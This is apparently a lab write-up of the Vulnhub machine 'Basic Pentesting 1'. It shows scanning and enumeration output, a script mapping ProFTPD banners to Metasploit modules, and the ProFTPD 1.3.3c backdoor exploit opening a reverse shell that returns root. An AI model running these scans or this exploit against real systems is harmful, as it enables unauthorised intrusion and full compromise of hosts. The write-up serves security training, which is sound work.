Basic Pentesting 1 (Vulnhub)
Let's do the write-up of this machine, which I came across the other day.

Scanning phase

Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.0.2.1        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.2.2        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.2.3        08:00:27:e8:77:ae      1      60  PCS Systemtechnik GmbH
 10.0.2.10       08:00:27:3e:c6:50      1      60  PCS Systemtechnik GmbH
We found ports 21, 22 and 80 open. The host is running Linux 3.x|4.x, more specifically Linux 3.2 - 4.14:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 13:30 WEST
Nmap scan report for 10.0.2.10
Host is up (0.00070s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:3E:C6:50 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds
Versions and vulnerabilities
- FTP: ProFTPD 1.3.3c (Metasploit)
- OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (CVE)
- Apache httpd 2.4.18 (CVE)
All the installed versions have known vulnerabilities. Since there is a website, let's check which resources are available.
Dirb
Running dirb against the host shows a hidden blog in the secret directory; from the type of content it is clearly a WordPress. Let's investigate it a bit.
┌──(kali㉿kali-vbox)-[~]
└─$ dirb http://10.0.2.10

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jul 22 10:11:06 2025
URL_BASE: http://10.0.2.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.0.2.10/ ----
+ http://10.0.2.10/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://10.0.2.10/secret/
+ http://10.0.2.10/server-status (CODE:403|SIZE:274)

---- Entering directory: http://10.0.2.10/secret/ ----
+ http://10.0.2.10/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/
==> DIRECTORY: http://10.0.2.10/secret/wp-content/
==> DIRECTORY: http://10.0.2.10/secret/wp-includes/
+ http://10.0.2.10/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.0.2.10/secret/wp-admin/ ----
+ http://10.0.2.10/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/css/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/images/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/includes/
+ http://10.0.2.10/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/js/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/maint/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/network/
==> DIRECTORY: http://10.0.2.10/secret/wp-admin/user/

---- Entering directory: http://10.0.2.10/secret/wp-content/ ----
+ http://10.0.2.10/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.0.2.10/secret/wp-content/plugins/
==> DIRECTORY: http://10.0.2.10/secret/wp-content/themes/

---- Entering directory: http://10.0.2.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.2.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.2.10/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.10/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.2.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.2.10/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.2.10/secret/wp-admin/network/ ----
+ http://10.0.2.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.0.2.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.0.2.10/secret/wp-admin/user/ ----
+ http://10.0.2.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.0.2.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://10.0.2.10/secret/wp-content/plugins/ ----
+ http://10.0.2.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://10.0.2.10/secret/wp-content/themes/ ----
+ http://10.0.2.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Tue Jul 22 10:11:50 2025
DOWNLOADED: 36896 - FOUND: 13
For now, under "Entering directory: http://10.0.2.10/secret/wp-admin/maint/" a database auto-repair tool shows up.

http://10.0.2.10/secret/xmlrpc.php tells us:

gobuster
gobuster does not give us any more information than we already had.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.2.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 307] [--> http://10.0.2.10/secret/]
/server-status (Status: 403) [Size: 274]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
Nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.10
+ Target Hostname: 10.0.2.10
+ Target Port: 80
+ Start Time: 2025-07-22 11:18:12 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD .
+ /secret/: Drupal Link header found with value: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8074 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2025-07-22 11:18:37 (GMT1) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
It gives us the same information we already had: there is no cgi-bin directory, so we rule out Shellshock-type vulnerabilities.
I swear cgi-bin has given me anxiety; what cost me so much effort on Sumo is now the first thing I check 😆
WPScan
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
______________________________________________________________
[+] URL: http://10.0.2.10/secret/ [10.0.2.10]
[+] Started: Tue Jul 22 11:22:43 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.0.2.10/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  - http://codex.wordpress.org/XML-RPC_Pingback_API
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.0.2.10/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.0.2.10/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).
| Found By: Emoji Settings (Passive Detection)
|  - http://10.0.2.10/secret/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9'
| Confirmed By: Meta Generator (Passive Detection)
|  - http://10.0.2.10/secret/, Match: 'WordPress 4.9'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |
==============================================================================
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 22 11:22:45 2025
[+] Requests Done: 139
[+] Cached Requests: 29
[+] Data Sent: 35.625 KB
[+] Data Received: 19.743 KB
[+] Memory used: 241.145 MB
[+] Elapsed time: 00:00:01
After trying to exploit a few vulnerabilities without success, let's take a break from getting in through WordPress and try to exploit some other vulnerability, for example in the FTP service.
ProFTPD » 1.3.3c
As we saw in our Nmap scan, port 21 (FTP) is open and runs ProFTPD version 1.3.3c. Source: CVE » ProFTPD 1.3.3c
By elimination we turned to Metasploit, and I searched for the FTP version:
msf6 > search proftpd

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   0   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2     \_ target: Automatic Targeting             .                .          .      .
   3     \_ target: Debug                           .                .          .      .
   4     \_ target: ProFTPD 1.3.0 (source install) / Debian 3.1      .          .      .
   5   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   6     \_ target: Automatic Targeting             .                .          .      .
   7     \_ target: Debug                           .                .          .      .
   8     \_ target: ProFTPD 1.3.2a Server (FreeBSD 8.0)              .          .      .
   9   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   10    \_ target: Automatic Targeting             .                .          .      .
   11    \_ target: Debug                           .                .          .      .
   12    \_ target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1   .          .      .
   13    \_ target: ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)      .      .
   14    \_ target: ProFTPD 1.3.2c Server (Ubuntu 10.04)             .          .      .
   15  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   16  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
We find exploit number 16, rated excellent and matching the version the FTP server is running.
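To turn a service banner into the same shortlist by hand, the following added example (my own code, not the author's or Metasploit's) parses the Nmap -sV lines from this scan and matches the ProFTPD version against the affected ranges in the `search proftpd` listing above; the sample lines and the range table are constructed from what appears on this page.

```python
import re
# Constructed sample: the service lines from the Nmap scan in this write-up.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
"""
# (module, lowest affected, highest affected) transcribed from the `search
# proftpd` listing above. Check is "No" for the 1.3.3c module: a 1.3.3c
# banner does not by itself prove the trojaned build is what is installed.
PROFTPD_MODULES = [
    ("exploit/linux/ftp/proftp_sreplace", "1.2", "1.3.0"),
    ("exploit/linux/ftp/proftp_telnet_iac", "1.3.2rc3", "1.3.3b"),
    ("exploit/unix/ftp/proftpd_133c_backdoor", "1.3.3c", "1.3.3c"),
    ("exploit/unix/ftp/proftpd_modcopy_exec", "1.3.5", "1.3.5"),
]
SERVICE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:rc(\d+)|([a-z]))?$")

def parse_nmap_services(text):
    """Return (port, proto, state, service, version) tuples from -sV output."""
    matches = (SERVICE_RE.match(line.strip()) for line in text.splitlines())
    return [(int(m.group(1)),) + m.groups()[1:] for m in matches if m]

def version_key(v):
    """Sortable key where 1.3.2rc3 < 1.3.2 < 1.3.2a < 1.3.3b < 1.3.3c."""
    m = VERSION_RE.match(v)
    if not m:
        raise ValueError("unrecognised ProFTPD version: %r" % v)
    nums = tuple(([int(x) for x in m.group(1).split(".")] + [0] * 4)[:4])
    if m.group(2):  # rcN sorts before the release it precedes
        return nums + (-1, int(m.group(2)))
    if m.group(3):  # a letter suffix sorts after the bare release
        return nums + (1, ord(m.group(3)))
    return nums + (0, 0)

def matching_modules(version):
    """Module names whose affected range covers this ProFTPD version."""
    k = version_key(version)
    return [n for n, lo, hi in PROFTPD_MODULES if version_key(lo) <= k <= version_key(hi)]

def triage(text):
    """Map each open ProFTPD port in the scan to the modules worth checking."""
    hits = {}
    for port, _proto, state, _svc, version in parse_nmap_services(text):
        m = re.search(r"ProFTPD (\S+)", version)
        if state == "open" and m:
            hits[port] = matching_modules(m.group(1))
    return hits
```

On this scan `triage(NMAP_OUTPUT)` returns `{21: ["exploit/unix/ftp/proftpd_133c_backdoor"]}`; a 1.3.3b banner would instead point at the Telnet IAC module, and 1.3.4a at none of them.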
Exploitation phase
We configure the options of the chosen module:
Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.9:4444
[*] 10.0.2.10:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KtZzHujlaeYveF2f;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KtZzHujlaeYveF2f\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.9:4444 -> 10.0.2.10:44118) at 2025-07-22 12:24:44 +0100
The exploit worked.
Verification
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
whoami
root